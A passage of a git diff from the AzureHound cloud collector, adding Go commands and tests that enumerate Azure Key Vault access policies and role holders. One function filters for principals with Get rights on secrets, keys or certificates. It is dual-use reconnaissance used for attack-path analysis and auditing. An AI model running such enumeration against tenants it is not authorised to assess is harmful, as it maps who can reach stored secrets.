listRootCmd.AddCommand(listKeyVaultAccessPoliciesCmd) +} + +func listKeyVaultAccessPoliciesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vault access policies...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + if filters, ok := config.KeyVaultAccessTypes.Value().([]enums.KeyVaultAccessType); !ok { + exit(fmt.Errorf("filter failed type assertion")) + } else { + if len(filters) > 0 { + log.Info("applying access type filters", "filters", filters) + } + stream := listKeyVaultAccessPolicies(ctx, azClient, listKeyVaults(ctx, azClient, subscriptions), filters) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } + panicrecovery.HandleBubbledPanic(ctx, stop, log) +} + +func listKeyVaultAccessPolicies(ctx context.Context, client client.AzureClient, keyVaults <-chan interface{}, filters []enums.KeyVaultAccessType) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + + for result := range pipeline.OrDone(ctx.Done(), keyVaults) { + if keyVault, ok := result.(AzureWrapper).Data.(models.KeyVault); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating key vault access policies", "result", result) + return + } else { + for _, policy := range keyVault.Properties.AccessPolicies { + if len(filters) == 0 { + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: kinds.KindAZKeyVaultAccessPolicy, + Data: models.KeyVaultAccessPolicy{ + KeyVaultId: keyVault.Id, + AccessPolicyEntry: policy, + }, + }); !ok { + return + } + } else { + for _, filter := range filters { + permissions := func() []string { + switch filter { + case enums.GetCerts: + return policy.Permissions.Certificates + case enums.GetKeys: + return policy.Permissions.Keys + case enums.GetSecrets: + return policy.Permissions.Secrets + default: + log.Error(fmt.Errorf("unsupported key vault access type: %s", filter), "unable to apply key vault access policy filter") + return []string{} + } + }() + if contains(permissions, "Get") { + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: kinds.KindAZKeyVaultAccessPolicy, + Data: models.KeyVaultAccessPolicy{ + KeyVaultId: keyVault.Id, + AccessPolicyEntry: policy, + }, + }); !ok { + return + } + break + } + } + } + } + } + } + }() + + return out +} diff --git a/cmd/list-key-vault-access-policies_test.go b/cmd/list-key-vault-access-policies_test.go new file mode 100644 index 0000000..877fe1f --- /dev/null +++ b/cmd/list-key-vault-access-policies_test.go @@ -0,0 +1,79 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaultAccessPolicies(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockKeyVaultsChannel := make(chan interface{}) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listKeyVaultAccessPolicies(ctx, mockClient, mockKeyVaultsChannel, nil) + + go func() { + defer close(mockKeyVaultsChannel) + mockKeyVaultsChannel <- AzureWrapper{ + Data: models.KeyVault{ + KeyVault: azure.KeyVault{ + Properties: azure.VaultProperties{ + AccessPolicies: []azure.AccessPolicyEntry{ + { + Permissions: azure.KeyVaultPermissions{ + Certificates: []string{"Get"}, + }, + }, + }, + }, + }, + }, + } + mockKeyVaultsChannel <- AzureWrapper{ + Data: models.KeyVault{}, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.KeyVaultAccessPolicy); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVaultAccessPolicy{}) + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-key-vault-contributors.go b/cmd/list-key-vault-contributors.go new file mode 100644 index 0000000..8bea518 --- /dev/null +++ b/cmd/list-key-vault-contributors.go @@ -0,0 +1,83 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listKeyVaultContributorsCmd) +} + +var listKeyVaultContributorsCmd = &cobra.Command{ + Use: "key-vault-contributors", + Long: "Lists Azure Key Vault Contributors", + Run: listKeyVaultContributorsCmdImpl, + SilenceUsage: true, +} + +func listKeyVaultContributorsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vault contributors...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + keyVaults := listKeyVaults(ctx, azClient, subscriptions) + kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listKeyVaultContributors(ctx, kvRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listKeyVaultContributors( + ctx context.Context, + kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.ContributorRoleID)) + + contributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultContributor { + return models.KeyVaultContributor{ + Contributor: ra.RoleAssignment, + KeyVaultId: ra.KeyVaultId, + } + }) + + return NewAzureWrapper(enums.KindAZKeyVaultContributor, models.KeyVaultContributors{ + KeyVaultId: ra.Data.KeyVaultId, + Contributors: contributors, + }) + }) +} diff --git a/cmd/list-key-vault-contributors_test.go b/cmd/list-key-vault-contributors_test.go new file mode 100644 index 0000000..d02586b --- /dev/null +++ b/cmd/list-key-vault-contributors_test.go @@ -0,0 +1,73 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaultContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listKeyVaultContributors(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper(enums.KindAZKeyVaultRoleAssignment, models.KeyVaultRoleAssignments{ + KeyVaultId: "foo", + RoleAssignments: []models.KeyVaultRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.ContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + }, + }, + }) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-key-vault-kvcontributors.go b/cmd/list-key-vault-kvcontributors.go new file mode 100644 index 0000000..1e8a864 --- /dev/null +++ b/cmd/list-key-vault-kvcontributors.go @@ -0,0 +1,83 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listKeyVaultKVContributorsCmd) +} + +var listKeyVaultKVContributorsCmd = &cobra.Command{ + Use: "key-vault-kvcontributors", + Long: "Lists Azure Key Vault KVContributors", + Run: listKeyVaultKVContributorsCmdImpl, + SilenceUsage: true, +} + +func listKeyVaultKVContributorsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vault kvcontributors...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + keyVaults := listKeyVaults(ctx, azClient, subscriptions) + kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listKeyVaultKVContributors(ctx, kvRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listKeyVaultKVContributors( + ctx context.Context, + kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.KeyVaultContributorRoleID)) + + kvContributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultKVContributor { + return models.KeyVaultKVContributor{ + KVContributor: ra.RoleAssignment, + KeyVaultId: ra.KeyVaultId, + } + }) + + return NewAzureWrapper(enums.KindAZKeyVaultKVContributor, models.KeyVaultKVContributors{ + KeyVaultId: ra.Data.KeyVaultId, + KVContributors: kvContributors, + }) + }) +} diff --git a/cmd/list-key-vault-kvcontributors_test.go b/cmd/list-key-vault-kvcontributors_test.go new file mode 100644 index 0000000..cd345d9 --- /dev/null +++ b/cmd/list-key-vault-kvcontributors_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaultKVContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listKeyVaultKVContributors(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZKeyVaultRoleAssignment, + models.KeyVaultRoleAssignments{ + KeyVaultId: "foo", + RoleAssignments: []models.KeyVaultRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.KeyVaultContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.KeyVaultContributorRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-key-vault-owners.go b/cmd/list-key-vault-owners.go new file mode 100644 index 0000000..3adb5d5 --- /dev/null +++ b/cmd/list-key-vault-owners.go @@ -0,0 +1,83 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listKeyVaultOwnersCmd) +} + +var listKeyVaultOwnersCmd = &cobra.Command{ + Use: "key-vault-owners", + Long: "Lists Azure Key Vault Owners", + Run: listKeyVaultOwnersCmdImpl, + SilenceUsage: true, +} + +func listKeyVaultOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vault owners...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + keyVaults := listKeyVaults(ctx, azClient, subscriptions) + kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listKeyVaultOwners(ctx, kvRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listKeyVaultOwners( + ctx context.Context, + kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.OwnerRoleID)) + + kvContributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultOwner { + return models.KeyVaultOwner{ + Owner: ra.RoleAssignment, + KeyVaultId: ra.KeyVaultId, + } + }) + + return NewAzureWrapper(enums.KindAZKeyVaultOwner, models.KeyVaultOwners{ + KeyVaultId: ra.Data.KeyVaultId, + Owners: kvContributors, + }) + }) +} diff --git a/cmd/list-key-vault-owners_test.go b/cmd/list-key-vault-owners_test.go new file mode 100644 index 0000000..c529689 --- /dev/null +++ b/cmd/list-key-vault-owners_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaultOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listKeyVaultOwners(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZKeyVaultRoleAssignment, + models.KeyVaultRoleAssignments{ + KeyVaultId: "foo", + RoleAssignments: []models.KeyVaultRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-key-vault-role-assignments.go b/cmd/list-key-vault-role-assignments.go new file mode 100644 index 0000000..c385d32 --- /dev/null +++ b/cmd/list-key-vault-role-assignments.go @@ -0,0 +1,129 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listKeyVaultRoleAssignmentsCmd) +} + +var listKeyVaultRoleAssignmentsCmd = &cobra.Command{ + Use: "key-vault-role-assignments", + Long: "Lists Key Vault Role Assignments", + Run: listKeyVaultRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listKeyVaultRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vault role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listKeyVaultRoleAssignments(ctx, azClient, listKeyVaults(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listKeyVaultRoleAssignments(ctx context.Context, client client.AzureClient, keyVaults <-chan interface{}) <-chan azureWrapper[models.KeyVaultRoleAssignments] { + var ( + out = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), keyVaults) { + if keyVault, ok := result.(AzureWrapper).Data.(models.KeyVault); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating key vault role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, keyVault.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + keyVaultRoleAssignments = models.KeyVaultRoleAssignments{ + KeyVaultId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this key vault", "keyVaultId", id) + } else { + keyVaultRoleAssignment := models.KeyVaultRoleAssignment{ + KeyVaultId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found key vault role assignment", "keyVaultRoleAssignment", keyVaultRoleAssignment) + count++ + keyVaultRoleAssignments.RoleAssignments = append(keyVaultRoleAssignments.RoleAssignments, keyVaultRoleAssignment) + } + } + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper(enums.KindAZKeyVaultRoleAssignment, keyVaultRoleAssignments)); !ok { + return + } + log.V(1).Info("finished listing key vault role assignments", "keyVaultId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all key vault role assignments") + }() + + return out +} diff --git a/cmd/list-key-vault-role-assignments_test.go b/cmd/list-key-vault-role-assignments_test.go new file mode 100644 index 0000000..d94018e --- /dev/null +++ b/cmd/list-key-vault-role-assignments_test.go @@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListKeyVaultRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockKeyVaultsChannel := make(chan interface{}) + mockKeyVaultRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockKeyVaultRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultRoleAssignmentChannel2).Times(1) + channel := listKeyVaultRoleAssignments(ctx, mockClient, mockKeyVaultsChannel) + + go func() { + defer close(mockKeyVaultsChannel) + mockKeyVaultsChannel <- AzureWrapper{ + Data: models.KeyVault{}, + } + mockKeyVaultsChannel <- AzureWrapper{ + Data: models.KeyVault{}, + } + }() + go func() { + defer close(mockKeyVaultRoleAssignmentChannel) + mockKeyVaultRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.KeyVaultContributorRoleID, + }, + }, + } + mockKeyVaultRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + } + }() + go func() { + defer close(mockKeyVaultRoleAssignmentChannel2) + mockKeyVaultRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.KeyVaultAdministratorRoleID, + }, + }, + } + mockKeyVaultRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 1) + } +} diff --git a/cmd/list-key-vault-user-access-admins.go b/cmd/list-key-vault-user-access-admins.go new file mode 100644 index 0000000..e0e2515 --- /dev/null +++ b/cmd/list-key-vault-user-access-admins.go @@ -0,0 +1,83 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listKeyVaultUserAccessAdminsCmd) +} + +var listKeyVaultUserAccessAdminsCmd = &cobra.Command{ + Use: "key-vault-user-access-admins", + Long: "Lists Azure Key Vault User Access Admins", + Run: listKeyVaultUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listKeyVaultUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure key vault user access admins...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + keyVaults := listKeyVaults(ctx, azClient, subscriptions) + kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listKeyVaultUserAccessAdmins(ctx, kvRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listKeyVaultUserAccessAdmins( + ctx context.Context, + kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.UserAccessAdminRoleID)) + + kvContributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultUserAccessAdmin { + return 